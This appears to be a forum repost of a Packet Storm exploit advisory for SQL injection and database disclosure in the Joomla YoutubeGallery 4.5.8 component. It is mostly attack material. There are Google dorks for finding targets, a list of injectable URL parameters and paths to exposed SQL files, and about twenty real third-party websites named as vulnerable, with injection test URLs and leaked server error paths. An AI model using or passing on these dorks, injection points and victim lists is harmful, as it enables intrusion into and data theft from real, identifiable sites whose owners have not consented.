Joomla YoutubeGallery 4.5.8 Database Disclosure / SQL Injection

#273
Topic created · 1 Posts · 0 Views
  • Joomla YoutubeGallery component version 4.5.8 suffers from database disclosure and remote SQL injection vulnerabilities.
    MD5 | 1f0d1a5760ad50229ec53fa02c921fef
    Download

    ########################################################################################  
    # Exploit Title : Joomla YoutubeGallery Components 4.5.8 Database  
    Disclosure and SQL Injection  
    # Author [ Discovered By ] : KingSkrupellos  
    # Team : Cyberizm Digital Security Army  
    # Date : 18/01/2019  
    # Vendor Homepage : joomlaboat.com  
    # Software Information Links :  
    extensions.joomla.org/extension/youtube-gallery/  
    joomlaboat.com/en/youtube-gallery  
    # Software Download Link :  
    joomlaboat.com/images/extensions/youtubegallery_free_4.5.8.zip  
    # Software Vulnerable Source Codes :  
    github.com/joomlagovbr/joomla-3.x/tree/master/administrator/components/com_youtubegallery/sql/updates/mysql  
    github.com/joomlagovbr/joomla-3.x/tree/master/administrator/components/com_youtubegallery/sql  
    # Software Affected Versions : 4.5.8 and previous versions  
    # Tested On : Windows and Linux  
    # Category : WebApps  
    # Exploit Risk : Medium  
    # Google Dorks : inurl:''/index.php?option=com_youtubegallery''  
    inurl:''/administrator/components/com_youtubegallery/''  
    # Previous Version : 4.1.7 CVE Details =>  
    nvd.nist.gov/vuln/detail/CVE-2014-4960 - cvedetails.com/cve/CVE-2014-4960/  
    # CVE : CVE-2014-4960  
    # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access  
    Controls ]  
    CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]  
    CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]  
    CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command  
    ('SQL Injection') ]  
    ########################################################################################  
    # SQL Injection Exploit :  
    **********************  
    /index.php?option=com_youtubegallery&view=gallery&layout=custom&Itemid=[SQL  
    Injection]  
    /index.php?option=com_youtubegallery&view=gallery&Itemid=[SQL Injection]  
    /index.php?option=com_youtubegallery&view=gallery&Itemid=[ID-NUMBER]&videoid=[SQL  
    Injection]  
    /index.php?option=com_youtubegallery&view=youtubegallery&Itemid=  
    [ID-NUMBER]&videoid=[YOUTUBE-VIDEO-ID-NUMBER]=[SQL Injection]  
    /index.php?option=com_youtubegallery&view=gallery&Itemid=  
    [ID-NUMBER]&videoid=[YOUTUBE-VIDEO-ID-NUMBER]&lang=[SQL Injection]  
    /index.php?option=com_youtubegallery&view=youtubegallery&galleryid=  
    [ID-NUMBER]&videoid=[YOUTUBE-VIDEO-ID-NUMBER]&tmpl=[SQL Injection]  
    /index.php?option=com_youtubegallery&view=youtubegallery&Itemid=  
    [ID-NUMBER]&galleryid=[ID-NUMBER]&videoid=[SQL Injection]  
    /index.php?option=com_easy_youtube_gallery&view=videos&mycategory=  
    [ID-NUMBER]&defaultvideo=[ID-NUMBER]&Itemid=[SQL Injection]  
    /index.php?option=com_youtubegallery&view=youtubegallery&listid=  
    [ID-NUMBER]&themeid=[ID-NUMBER]'&videoid=  
    [YOUTUBE-VIDEO-ID-NUMBER]&tmpl=component&TB_iframe=  
    true&height=[ID-NUMBER]&width=[SQL Injection]  
    ########################################################################################  
    # Database Disclosure Exploit :  
    ***************************  
    /administrator/components/com_youtubegallery/sql/install.mysql.utf8.sql  
    /administrator/components/com_youtubegallery/sql/uninstall.mysql.utf8.sql  
    /administrator/components/com_youtubegallery/sql/updates/mysql/0.0.1.sql  
    /administrator/components/com_youtubegallery/sql/updates/mysql/1.2.1.sql  
    /administrator/components/com_youtubegallery/sql/updates/mysql/1.2.2.sql  
    /administrator/components/com_youtubegallery/sql/updates/mysql/1.2.3.sql  
    /administrator/components/com_youtubegallery/sql/updates/mysql/1.2.5.sql  
    /administrator/components/com_youtubegallery/sql/updates/mysql/1.3.3.sql  
    /administrator/components/com_youtubegallery/sql/updates/mysql/1.3.5.sql  
    /administrator/components/com_youtubegallery/sql/updates/mysql/1.3.6.sql  
    /administrator/components/com_youtubegallery/sql/updates/mysql/1.3.7.sql  
    /administrator/components/com_youtubegallery/sql/updates/mysql/2.0.0.sql  
    /administrator/components/com_youtubegallery/sql/updates/mysql/2.1.0.sql  
    /administrator/components/com_youtubegallery/sql/updates/mysql/2.1.3.sql  
    /administrator/components/com_youtubegallery/sql/updates/mysql/2.1.4.sql  
    /administrator/components/com_youtubegallery/sql/updates/mysql/2.2.0.sql  
    /administrator/components/com_youtubegallery/sql/updates/mysql/2.2.7.sql  
    /administrator/components/com_youtubegallery/sql/updates/mysql/2.2.9.sql  
    /administrator/components/com_youtubegallery/sql/updates/mysql/2.3.0.sql  
    /administrator/components/com_youtubegallery/sql/updates/mysql/3.0.0.sql  
    /administrator/components/com_youtubegallery/sql/updates/mysql/3.0.6.sql  
    /administrator/components/com_youtubegallery/sql/updates/mysql/3.1.3.sql  
    /administrator/components/com_youtubegallery/sql/updates/mysql/3.1.5.sql  
    /administrator/components/com_youtubegallery/sql/updates/mysql/3.1.8.sql  
    /administrator/components/com_youtubegallery/sql/updates/mysql/3.2.4.sql  
    /administrator/components/com_youtubegallery/sql/updates/mysql/3.2.7.sql  
    /administrator/components/com_youtubegallery/sql/updates/mysql/3.3.6.sql  
    /administrator/components/com_youtubegallery/sql/updates/mysql/3.3.7.sql  
    /administrator/components/com_youtubegallery/sql/updates/mysql/3.3.9.sql  
    /administrator/components/com_youtubegallery/sql/updates/mysql/3.4.8.sql  
    /administrator/components/com_youtubegallery/sql/updates/mysql/3.5.7.sql  
    /administrator/components/com_youtubegallery/sql/updates/mysql/3.5.8.sql  
    ########################################################################################  
    # Example Vulnerable Sites :  
    *************************  
    [+]  
    terrabit.com.br/cmfp/administrator/components/com_youtubegallery/sql/install.mysql.utf8.sql  
    [+]  
    jfkleinheidorn.de/administrator/components/com_youtubegallery/sql/updates/mysql/2.1.3.sql  
    [+]  
    ceensac.com/index.php?option=com_youtubegallery&view=youtubegallery&galleryid=1&Itemid=266%27  
    =>  
    [ Proof of Concept for SQL Injection ] => archive.is/VXqiB  
    [+]  
    newyddwelshcobs.co.uk/index.php?option=com_youtubegallery&view=gallery&Itemid=48&videoid=1%27  
    [+]  
    medealabperu.com/senscience/index.php?option=com_youtubegallery&view=youtubegallery&galleryid=1&videoid=82X2hj53r2I&tmpl=1%27  
    [+]  
    praiamotor.com.br/index.php?option=com_youtubegallery&view=gallery&Itemid=37%27  
    [+]  
    ncd.org.jo/index.php?option=com_youtubegallery&view=gallery&Itemid=128%27  
    [+]  
    nazarethchurchnotethnic.org/index.php?option=com_youtubegallery&view=youtubegallery&Itemid=216&galleryid=1&videoid=1%27  
    [+]  
    aakashgupta.com/index.php?option=com_youtubegallery&view=gallery&layout=custom&Itemid=113%27  
    [+]  
    mindthekids.com.co/index.php?option=com_youtubegallery&view=gallery&Itemid=95&videoid=1%27  
    [+]  
    ourtransition.info/index.php?option=com_youtubegallery&view=gallery&Itemid=6%27  
    [+]  
    ventzimartinov.com/index.php?option=com_youtubegallery&view=gallery&Itemid=56&videoid=u-OtHblFgkc&lang=1%27  
    [+]  
    ponowa48.pl/index.php?option=com_youtubegallery&view=gallery&Itemid=114%27  
    [+]  
    srisaidarshan.org/index.php?option=com_youtubegallery&view=youtubegallery&galleryid=22%27  
    [+]  
    carpmachine.at/index.php?option=com_youtubegallery&view=youtubegallery&galleryid=1&Itemid=140  
    '  
    [+]  
    ondazul.org.br/site/index.php?option=com_youtubegallery&view=gallery&Itemid=73  
    '  
    [+]  
    hitech-stroy.ck.ua/index.php?option=com_youtubegallery&view=gallery&Itemid=4  
    '  
    [+]  
    hundesport-gersdorf.de/index.php?option=com_youtubegallery&view=youtubegallery&Itemid=158&videoid=P833hFQoB4A=1%27  
    [+]  
    jamesallenclark.com/index.php?option=com_youtubegallery&view=gallery&Itemid=57  
    '  
    ########################################################################################  
    # Example SQL Database Error :  
    Strict Standards: Only variables should be assigned by reference in  
    /home/medealab/public_html/senscience/plugins/system/rokbox/rokbox.php on  
    line 51  
    Deprecated: Non-static method VideoSource_YouTube::extractYouTubeID()  
    should not be  
    called statically, assuming $this from incompatible context in  
    /home/medealab  
    /public_html/senscience/components/com_youtubegallery/includes/misc.php on  
    line 198  
    Warning: DOMDocument::load(  
    http://gdata.
    ) [domdocument.load]: failed to open stream: HTTP request failed! HTTP/1.0 410 Gone in /usr/home/gurjiysp/data/www/hitech-stroy.ck.ua/components /com_youtubegallery/models/gallery.php on line 145 ######################################################################################## # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ########################################################################################

    Source: packetstormsecurity.com

Log in to reply